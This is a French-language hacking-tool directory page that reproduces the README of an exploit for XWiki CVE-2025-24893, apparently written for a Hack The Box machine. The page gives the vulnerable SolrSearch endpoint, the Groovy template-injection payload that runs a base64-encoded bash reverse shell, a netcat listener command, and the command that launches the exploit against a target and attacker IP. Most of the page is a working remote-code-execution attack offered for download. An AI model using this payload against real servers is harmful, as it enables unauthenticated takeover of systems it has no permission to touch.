Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
xwiki-cve-2025-24893-exploit — Exploit RCE non authentifié pour XWiki CVE-2025-24893 via injection de script Groovy | Kitploit
Outils/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

Exploit RCE non authentifié pour XWiki CVE-2025-24893 via injection de script Groovy

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 7 moisPas encore vérifié

Exploit XWiki CVE-2025-24893

Exploit d'exécution de code à distance non authentifié pour les versions de XWiki vulnérables à CVE-2025-24893.

Aperçu de la vulnérabilité

Les versions de XWiki antérieures à 15.10.9 sont vulnérables à une RCE non authentifiée via l'injection de script Groovy dans le gestionnaire de flux RSS SolrSearch. La vulnérabilité existe car XWiki ne parvient pas à assainir correctement les entrées utilisateur dans le paramètre text, permettant aux attaquants de sortir du contexte RSS et d'injecter du code Groovy arbitraire.

Identifiant CVE : CVE-2025-24893
Score CVSS : 9.8 (Critique)
Versions affectées : XWiki < 15.10.9

Fonctionnalités

  • Interface en ligne de commande simple
  • Génération et encodage automatiques de la charge utile
  • Reverse shell encodé en Base64 pour contourner les filtres de base
  • Dépendances minimales (seulement la bibliothèque requests)

Prérequis

root@kitploit:~
pip3 install requests

Utilisation

root@kitploit:~
python3 exploit.py <target_url> <attacker_ip> <listener_port>

Exemple :

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 9001

# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

Fonctionnement

  1. Construit une commande de reverse shell bash
  2. Encode la charge utile en Base64
  3. L'encapsule dans du code Groovy en utilisant l'injection de template (}}}}}}{{{{groovy}}}})
  4. Encode l'URL de la charge utile tout en préservant les délimiteurs nécessaires
  5. Envoie une requête GET à /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>
  6. XWiki traite le flux RSS malveillant et exécute le code Groovy

Preuve de concept

L'exploit cible le point de terminaison suivant :

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

La vulnérabilité permet de sortir du contexte du flux RSS :

root@kitploit:~
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce programme. Utilisez cet exploit uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Références

  • Avis de sécurité XWiki
  • CVE-2025-24893

Licence

Licence MIT - Voir le fichier LICENSE pour plus de détails

Auteur

Créé pour la box HTB "Editor"


Remarque : Assurez-vous toujours d'avoir une autorisation appropriée avant de tester des systèmes.

Télécharger l’outil